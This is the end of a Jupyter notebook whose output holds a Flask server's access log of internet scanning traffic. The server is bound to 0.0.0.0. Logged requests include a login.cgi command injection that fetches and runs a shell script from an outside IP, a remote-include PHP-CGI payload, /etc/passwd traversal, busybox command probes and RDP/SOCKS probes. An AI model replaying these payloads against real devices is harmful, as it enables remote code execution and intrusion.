      "189.203.177.24 - - [08/Sep/2019 06:07:07] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "187.189.222.171 - - [08/Sep/2019 07:06:07] code 400, message Bad request version ('HTTP')\n",
      "187.189.222.171 - - [08/Sep/2019 07:06:07] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "168.0.155.142 - - [08/Sep/2019 09:18:19] \"GET / HTTP/1.1\" 404 -\n",
      "120.78.127.165 - - [08/Sep/2019 09:41:44] \"GET /login.cgi?cli=aa%20aa%27;wget%20http://206.72.206.82/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1\" 404 -\n",
      "89.248.174.219 - - [08/Sep/2019 10:11:23] \"GET /lang/en/html/index.html HTTP/1.1\" 404 -\n",
      "89.248.174.219 - - [08/Sep/2019 10:45:30] \"GET /lang/en/html/index.html HTTP/1.1\" 404 -\n",
      "193.188.22.56 - - [08/Sep/2019 10:52:18] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:')\n",
      "193.188.22.56 - - [08/Sep/2019 10:52:18] \"\u0003\u0000\u0000/*à\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr\" HTTPStatus.BAD_REQUEST -\n",
      "89.248.174.219 - - [08/Sep/2019 11:20:39] \"GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin4.657889E-310simulation%3Don+-d+disable_functions%3D\\\"\\\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp0X0.055BE8107F6AP-10220.0000000.00000045.77.112.2160.000000fuck.txt+-d+cgi4.657888E-310force_redirect%3D0+-d+cgi4.657888E-310redirect_status_env%3D0+-n HTTP/1.1\" 404 -\n",
      "89.248.174.219 - - [08/Sep/2019 11:58:52] \"GET / HTTP/1.1\" 404 -\n",
      "89.248.174.219 - - [08/Sep/2019 12:19:10] \"GET / HTTP/1.1\" 404 -\n",
      "159.203.199.46 - - [08/Sep/2019 12:22:18] \"GET / HTTP/1.1\" 404 -\n",
      "78.188.219.200 - - [08/Sep/2019 12:24:34] \"GET / HTTP/1.1\" 404 -\n",
      "172.28.0.3 - - [08/Sep/2019 12:37:36] \"GET /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [08/Sep/2019 12:37:37] \"GET /favicon.ico HTTP/1.1\" 404 -\n",
      "172.28.0.3 - - [08/Sep/2019 12:37:46] \"POST /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [08/Sep/2019 12:37:50] \"GET /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [08/Sep/2019 12:38:42] \"GET /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [08/Sep/2019 12:38:42] \"GET /favicon.ico HTTP/1.1\" 404 -\n",
      "45.136.108.26 - - [08/Sep/2019 14:41:58] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:')\n",
      "45.136.108.26 - - [08/Sep/2019 14:41:58] \"\u0003\u0000\u0000/*à\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr\" HTTPStatus.BAD_REQUEST -\n",
      "106.75.2.200 - - [08/Sep/2019 14:46:30] \"GET / HTTP/1.0\" 404 -\n",
      "140.148.226.6 - - [08/Sep/2019 16:19:29] code 400, message Bad request version ('HTTP')\n",
      "140.148.226.6 - - [08/Sep/2019 16:19:29] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "14.161.151.186 - - [08/Sep/2019 17:11:29] code 400, message Bad request version ('HTTP')\n",
      "14.161.151.186 - - [08/Sep/2019 17:11:29] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "115.84.99.73 - - [08/Sep/2019 17:11:47] code 400, message Bad request version ('HTTP')\n",
      "115.84.99.73 - - [08/Sep/2019 17:11:47] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "66.240.205.34 - - [08/Sep/2019 18:22:53] code 400, message Bad request version (\"x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==\")\n",
      "66.240.205.34 - - [08/Sep/2019 18:22:53] \"145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==\" HTTPStatus.BAD_REQUEST -\n",
      "190.94.144.65 - - [08/Sep/2019 18:31:31] \"GET / HTTP/1.1\" 404 -\n",
      "188.168.252.168 - - [08/Sep/2019 18:51:45] \"GET / HTTP/1.1\" 404 -\n",
      "103.245.79.192 - - [08/Sep/2019 19:24:56] \"GET / HTTP/1.1\" 404 -\n",
      "61.160.223.144 - - [08/Sep/2019 21:17:10] \"GET /phpmyadmin HTTP/1.1\" 404 -\n",
      "89.248.174.219 - - [08/Sep/2019 22:02:01] \"GET ../../mnt/custom/ProductDefinition HTTP/1.1\" 404 -\n",
      "89.248.174.219 - - [08/Sep/2019 22:05:39] \"GET ../../mnt/custom/ProductDefinition HTTP/1.1\" 404 -\n",
      "89.248.174.219 - - [08/Sep/2019 23:03:32] \"GET ../../etc/passwd HTTP/1.1\" 404 -\n",
      "89.248.174.219 - - [09/Sep/2019 01:38:14] \"GET aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1\" 404 -\n",
      "90.224.214.227 - - [09/Sep/2019 02:06:23] \"GET / HTTP/1.1\" 404 -\n",
      "89.248.174.219 - - [09/Sep/2019 03:03:04] \"GET /lang_pack/EN.js HTTP/1.1\" 404 -\n",
      "203.160.61.230 - - [09/Sep/2019 03:51:03] \"GET / HTTP/1.1\" 404 -\n",
      "61.219.11.153 - - [09/Sep/2019 05:46:42] \"GET / HTTP/1.1\" 404 -\n",
      "139.162.119.197 - - [09/Sep/2019 05:51:40] \"GET / HTTP/1.1\" 404 -\n",
      "140.115.236.39 - - [09/Sep/2019 07:24:28] \"GET /homework HTTP/1.1\" 404 -\n",
      "140.115.236.39 - - [09/Sep/2019 07:24:28] \"GET /favicon.ico HTTP/1.1\" 404 -\n",
      "140.115.236.39 - - [09/Sep/2019 07:24:37] \"GET /homework HTTP/1.1\" 404 -\n",
      "45.180.38.233 - - [09/Sep/2019 08:01:02] \"GET / HTTP/1.1\" 404 -\n",
      "113.172.234.241 - - [09/Sep/2019 08:14:14] code 400, message Bad request version ('HTTP')\n",
      "113.172.234.241 - - [09/Sep/2019 08:14:14] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "115.236.61.203 - - [09/Sep/2019 08:32:00] \"GET / HTTP/1.0\" 404 -\n",
      "115.238.44.234 - - [09/Sep/2019 08:33:13] \"GET / HTTP/1.0\" 404 -\n",
      "47.244.5.202 - - [09/Sep/2019 08:52:08] \"PROPFIND / HTTP/1.1\" 404 -\n",
      "47.244.5.202 - - [09/Sep/2019 08:52:08] \"GET /webdav/ HTTP/1.1\" 404 -\n",
      "114.134.11.31 - - [09/Sep/2019 10:02:10] \"GET / HTTP/1.1\" 404 -\n",
      "181.39.236.122 - - [09/Sep/2019 12:03:18] \"GET / HTTP/1.1\" 404 -\n",
      "39.98.213.1 - - [09/Sep/2019 12:04:54] \"GET / HTTP/1.1\" 404 -\n",
      "18.144.62.49 - - [09/Sep/2019 12:05:49] \"GET / HTTP/1.1\" 404 -\n",
      "121.7.185.5 - - [09/Sep/2019 12:40:54] \"GET / HTTP/1.1\" 404 -\n",
      "113.172.49.131 - - [09/Sep/2019 13:06:53] code 400, message Bad request version ('HTTP')\n",
      "113.172.49.131 - - [09/Sep/2019 13:06:53] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "5.188.210.101 - - [09/Sep/2019 14:35:48] code 400, message Bad request syntax ('\\x05\\x01\\x00')\n",
      "5.188.210.101 - - [09/Sep/2019 14:35:48] \"\u0005\u0001\u0000\" HTTPStatus.BAD_REQUEST -\n",
      "5.188.210.101 - - [09/Sep/2019 14:35:54] code 400, message Bad request syntax ('\\x05\\x01\\x00')\n",
      "5.188.210.101 - - [09/Sep/2019 14:35:54] \"\u0005\u0001\u0000\" HTTPStatus.BAD_REQUEST -\n",
      "5.188.210.101 - - [09/Sep/2019 14:36:00] code 400, message Bad request syntax ('\\x05\\x01\\x00')\n",
      "5.188.210.101 - - [09/Sep/2019 14:36:00] \"\u0005\u0001\u0000\" HTTPStatus.BAD_REQUEST -\n",
      "5.188.210.101 - - [09/Sep/2019 14:36:32] code 400, message Bad request syntax ('\\x04\\x01\\x00P\\x05¼Òe\\x00')\n",
      "5.188.210.101 - - [09/Sep/2019 14:36:32] \"\u0004\u0001\u0000P\u0005¼Òe\u0000\" HTTPStatus.BAD_REQUEST -\n",
      "5.188.210.101 - - [09/Sep/2019 14:36:39] code 400, message Bad request syntax ('\\x04\\x01\\x00P\\x05¼Òe\\x00')\n",
      "5.188.210.101 - - [09/Sep/2019 14:36:39] \"\u0004\u0001\u0000P\u0005¼Òe\u0000\" HTTPStatus.BAD_REQUEST -\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "5.188.210.101 - - [09/Sep/2019 14:36:48] code 400, message Bad request syntax ('\\x04\\x01\\x00P\\x05¼Òe\\x00')\n",
      "5.188.210.101 - - [09/Sep/2019 14:36:48] \"\u0004\u0001\u0000P\u0005¼Òe\u0000\" HTTPStatus.BAD_REQUEST -\n",
      "60.191.38.77 - - [09/Sep/2019 14:37:37] \"GET / HTTP/1.1\" 404 -\n",
      "5.188.210.101 - - [09/Sep/2019 14:37:55] \"GET http://5.188.210.101/echo.php HTTP/1.1\" 404 -\n",
      "181.163.93.105 - - [09/Sep/2019 17:43:56] \"GET / HTTP/1.1\" 404 -\n",
      "195.230.113.240 - - [09/Sep/2019 18:08:25] \"GET / HTTP/1.1\" 404 -\n",
      "47.15.216.93 - - [09/Sep/2019 18:59:41] \"HEAD /robots.txt HTTP/1.0\" 404 -\n",
      "27.145.61.125 - - [09/Sep/2019 20:07:45] \"GET / HTTP/1.1\" 404 -\n",
      "202.86.216.228 - - [09/Sep/2019 20:13:39] \"GET / HTTP/1.1\" 404 -\n",
      "120.132.3.65 - - [09/Sep/2019 20:25:33] code 400, message Bad request syntax ('\\x04\\x01\\x00PpTi4\\x00')\n",
      "120.132.3.65 - - [09/Sep/2019 20:25:33] \"\u0004\u0001\u0000PpTi4\u0000\" HTTPStatus.BAD_REQUEST -\n",
      "120.132.3.65 - - [09/Sep/2019 20:25:33] code 400, message Bad request syntax ('\\x05\\x01\\x00')\n",
      "120.132.3.65 - - [09/Sep/2019 20:25:33] \"\u0005\u0001\u0000\" HTTPStatus.BAD_REQUEST -\n",
      "120.132.3.65 - - [09/Sep/2019 20:25:33] \"GET http://www.qq.com/404/search_children.js HTTP/1.1\" 404 -\n",
      "222.79.48.31 - - [09/Sep/2019 20:35:37] code 400, message Bad request syntax ('\\x05\\x03\\x00\\x01\\x02')\n",
      "222.79.48.31 - - [09/Sep/2019 20:35:37] \"\u0005\u0003\u0000\u0001\u0002\" HTTPStatus.BAD_REQUEST -\n",
      "45.180.192.242 - - [09/Sep/2019 20:48:43] \"GET / HTTP/1.1\" 404 -\n",
      "185.65.134.232 - - [09/Sep/2019 20:50:41] \"GET / HTTP/1.1\" 404 -\n",
      "159.146.3.34 - - [09/Sep/2019 22:04:24] \"GET / HTTP/1.1\" 404 -\n",
      "208.100.26.229 - - [09/Sep/2019 22:09:18] \"GET / HTTP/1.0\" 404 -\n",
      "208.100.26.229 - - [09/Sep/2019 22:11:16] \"GET /nmaplowercheck1568067075 HTTP/1.1\" 404 -\n",
      "208.100.26.229 - - [09/Sep/2019 22:11:16] \"HEAD / HTTP/1.1\" 404 -\n",
      "208.100.26.229 - - [09/Sep/2019 22:11:16] \"GET /HNAP1 HTTP/1.1\" 404 -\n",
      "208.100.26.229 - - [09/Sep/2019 22:11:16] \"GET / HTTP/1.1\" 404 -\n",
      "208.100.26.229 - - [09/Sep/2019 22:11:17] \"POST /sdk HTTP/1.1\" 404 -\n",
      "208.100.26.229 - - [09/Sep/2019 22:11:17] \"GET /evox/about HTTP/1.1\" 404 -\n",
      "208.100.26.229 - - [09/Sep/2019 22:11:17] \"GET / HTTP/1.0\" 404 -\n",
      "208.100.26.229 - - [09/Sep/2019 22:11:17] \"GET / HTTP/1.1\" 404 -\n",
      "189.132.86.81 - - [09/Sep/2019 22:16:31] \"GET / HTTP/1.1\" 404 -\n",
      "209.17.97.26 - - [09/Sep/2019 22:21:22] \"GET / HTTP/1.0\" 404 -\n",
      "14.177.152.99 - - [09/Sep/2019 22:21:30] code 400, message Bad request version ('HTTP')\n",
      "14.177.152.99 - - [09/Sep/2019 22:21:30] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "14.177.152.99 - - [09/Sep/2019 22:23:33] code 400, message Bad request version ('HTTP')\n",
      "14.177.152.99 - - [09/Sep/2019 22:23:33] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "14.177.152.99 - - [09/Sep/2019 22:37:57] code 400, message Bad request version ('HTTP')\n",
      "14.177.152.99 - - [09/Sep/2019 22:37:57] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "14.177.152.99 - - [09/Sep/2019 22:43:07] code 400, message Bad request version ('HTTP')\n",
      "14.177.152.99 - - [09/Sep/2019 22:43:07] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "170.0.92.3 - - [10/Sep/2019 00:01:37] \"GET / HTTP/1.1\" 404 -\n",
      "34.68.173.228 - - [10/Sep/2019 00:17:17] \"GET / HTTP/1.1\" 404 -\n",
      "85.105.241.247 - - [10/Sep/2019 00:48:46] \"GET / HTTP/1.1\" 404 -\n",
      "162.209.181.234 - - [10/Sep/2019 00:59:38] \"GET / HTTP/1.1\" 404 -\n",
      "185.65.134.232 - - [10/Sep/2019 01:36:40] \"GET / HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:50] \"GET / HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:50] \"GET / HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:50] \"GET / HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:51] \"GET / HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:51] \"GET /currentsetting.htm HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:51] \"GET / HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:51] \"GET /winbox.png HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:52] \"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:52] \"GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:53] \"GET /device_description.xml HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:55] \"GET /current_config/passwd HTTP/1.1\" 404 -\n",
      "182.138.215.19 - - [10/Sep/2019 02:25:55] \"GET /login/login.html HTTP/1.1\" 404 -\n",
      "176.240.110.210 - - [10/Sep/2019 02:39:01] code 400, message Bad request version ('HTTP')\n",
      "176.240.110.210 - - [10/Sep/2019 02:39:01] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "187.66.146.193 - - [10/Sep/2019 05:10:12] code 400, message Bad request version ('HTTP')\n",
      "187.66.146.193 - - [10/Sep/2019 05:10:12] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "34.76.197.143 - - [10/Sep/2019 05:32:29] \"GET / HTTP/1.1\" 404 -\n",
      "151.249.106.238 - - [10/Sep/2019 06:14:38] \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1\" 404 -\n",
      "62.173.140.192 - - [10/Sep/2019 07:21:34] \"GET /000000000000.cfg HTTP/1.1\" 404 -\n",
      "62.173.140.192 - - [10/Sep/2019 07:21:35] \"GET /y000000000000.cfg HTTP/1.1\" 404 -\n",
      "62.173.140.192 - - [10/Sep/2019 07:21:36] \"GET /provisioning/y000000000000.cfg HTTP/1.1\" 404 -\n",
      "62.173.140.192 - - [10/Sep/2019 07:21:36] \"GET /provisioning/000000000000.cfg HTTP/1.1\" 404 -\n",
      "198.108.66.80 - - [10/Sep/2019 08:02:16] \"GET / HTTP/1.1\" 404 -\n",
      "109.242.122.209 - - [10/Sep/2019 10:56:57] \"GET / HTTP/1.1\" 404 -\n",
      "61.219.11.153 - - [10/Sep/2019 11:05:09] \"GET / HTTP/1.1\" 404 -\n",
      "113.162.162.198 - - [10/Sep/2019 12:55:00] code 400, message Bad request version ('HTTP')\n",
      "113.162.162.198 - - [10/Sep/2019 12:55:00] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "62.173.140.192 - - [10/Sep/2019 13:06:12] \"GET /000000000000.cfg HTTP/1.1\" 404 -\n",
      "62.173.140.192 - - [10/Sep/2019 13:06:12] \"GET /y000000000000.cfg HTTP/1.1\" 404 -\n",
      "62.173.140.192 - - [10/Sep/2019 13:06:13] \"GET /provisioning/y000000000000.cfg HTTP/1.1\" 404 -\n",
      "62.173.140.192 - - [10/Sep/2019 13:06:14] \"GET /provisioning/000000000000.cfg HTTP/1.1\" 404 -\n",
      "123.58.241.15 - - [10/Sep/2019 14:14:27] \"GET /TP/public/index.php HTTP/1.1\" 404 -\n",
      "123.58.241.15 - - [10/Sep/2019 14:14:27] \"GET /TP/index.php HTTP/1.1\" 404 -\n",
      "123.58.241.15 - - [10/Sep/2019 14:14:28] \"GET /thinkphp/html/public/index.php HTTP/1.1\" 404 -\n",
      "123.58.241.15 - - [10/Sep/2019 14:14:28] \"GET /html/public/index.php HTTP/1.1\" 404 -\n",
      "123.58.241.15 - - [10/Sep/2019 14:14:28] \"GET /public/index.php HTTP/1.1\" 404 -\n",
      "123.58.241.15 - - [10/Sep/2019 14:14:28] \"GET /TP/html/public/index.php HTTP/1.1\" 404 -\n",
      "123.58.241.15 - - [10/Sep/2019 14:14:28] \"GET /elrekt.php HTTP/1.1\" 404 -\n",
      "123.58.241.15 - - [10/Sep/2019 14:14:28] \"GET /index.php HTTP/1.1\" 404 -\n",
      "123.58.241.15 - - [10/Sep/2019 14:14:29] \"GET / HTTP/1.1\" 404 -\n",
      "194.132.235.86 - - [10/Sep/2019 14:35:07] \"GET /shell?busybox HTTP/1.1\" 404 -\n",
      "92.118.160.9 - - [10/Sep/2019 15:23:30] \"GET / HTTP/1.0\" 404 -\n",
      "85.100.42.11 - - [10/Sep/2019 16:06:01] \"GET / HTTP/1.1\" 404 -\n",
      "222.252.25.132 - - [10/Sep/2019 16:18:18] code 400, message Bad request version ('HTTP')\n",
      "222.252.25.132 - - [10/Sep/2019 16:18:18] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "181.129.70.170 - - [10/Sep/2019 16:50:20] code 400, message Bad request version ('HTTP')\n",
      "181.129.70.170 - - [10/Sep/2019 16:50:20] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "187.212.188.93 - - [10/Sep/2019 17:12:52] \"GET / HTTP/1.1\" 404 -\n",
      "27.3.37.154 - - [10/Sep/2019 18:42:54] code 400, message Bad request version ('HTTP')\n",
      "27.3.37.154 - - [10/Sep/2019 18:42:54] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "27.3.37.154 - - [10/Sep/2019 18:44:20] code 400, message Bad request version ('HTTP')\n",
      "27.3.37.154 - - [10/Sep/2019 18:44:20] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "91.121.0.159 - - [10/Sep/2019 20:03:34] \"GET / HTTP/1.1\" 404 -\n",
      "14.248.145.4 - - [10/Sep/2019 20:41:25] code 400, message Bad request version ('HTTP')\n",
      "14.248.145.4 - - [10/Sep/2019 20:41:25] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "209.17.96.98 - - [10/Sep/2019 20:45:33] \"GET / HTTP/1.0\" 404 -\n"
     ]
    }
   ],
   "source": [
    "#運行flask server，運行在0.0.0.0:5000\n",
    "#要特別注意假如運行在127.0.0.1的話，會變成只有本機連的到，外網無法\n",
    "app.run(host='0.0.0.0',port=5000)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.7.3"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 2
}
